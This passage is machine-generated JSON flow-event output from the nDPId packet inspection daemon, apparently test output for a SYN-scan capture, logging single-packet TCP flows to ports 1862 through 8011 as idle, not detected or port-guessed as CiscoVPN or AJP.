+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
